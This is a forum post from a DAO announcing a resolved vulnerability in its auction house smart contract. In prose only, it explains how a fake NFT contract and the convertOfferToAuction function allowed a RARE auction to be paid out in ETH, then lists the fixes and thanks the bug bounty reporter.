RESOLVED: Auction house contract vulnerability walkthrough

Hello Fellow DAO members,

This post is an announcement of a vulnerability found and resolved in the auction house contract that was brought to the attention of DAO Council.

TLDR;

Funds safu. DAO Council suspended RARE payments while a fixed was implemented. The fix went live September 4th, 2023 11:43:35 PM +UTC which additionally re-instated RARE payments.

Details

On August 19th, the existence of a vulnerability by means of the convertOfferToAuction function on the Auction house logic contract was brought to the DAO Council’s attention by @ayeslick.

RARE Payments Disabled

The exploit was only viable so long RARE payments were enabled. The council temporarily suspended RARE payments until the fix went live.

Summary of the Vulnerability

The short version of the summary is that one could create an auction in RARE and then switch it to be an ETH auction and get the auction to payout in ETH.

This was possible by using a Fake NFT contract. By fake I mean an NFT contract that didn’t actually change owners when the transfer function was called. Because our auction contract escrows the NFT, it assumed that once an auction started, the NFT would be in escrow. With the Fake NFT contract, an auction in RARE could be started using the convertOfferToAuction but still allow a new auction to be configured with the converted offer (now a bid) remaining in place.

The exploiter could configure a new auction with a different currency, in this case ETH, and then once the auction settled, the auction creator would be paid out in ETH, the amount of RARE initially put up when convertOfferToAuction was called.

An explanation as well as a test case exist on the repository. See this Pull Request for further details.

Resolution

This was fixed by:

  1. Preventing auctions being configured if a bid exists (i.e. it is a running auction)
  2. Adding a check in the convertOfferToAuction from working if there is a running or unsettled auction
  3. When an auction is settled, it settles referencing the currency sent with the bid so that it only ever uses the same currency as the currency sent into the contract.

Here is a link to the new implementation.

Acknowledgements

Huge thank you to Ayeslick for bringing this to our attention and through the discretion of our bug bounty program.

Another big thank you to @koloz writing the majority of the fix to get this resolved in a timely manner.

4 Likes

Ayeslick published a more involved post here!

I highly recommend as for any solidity devs as it’s a great read.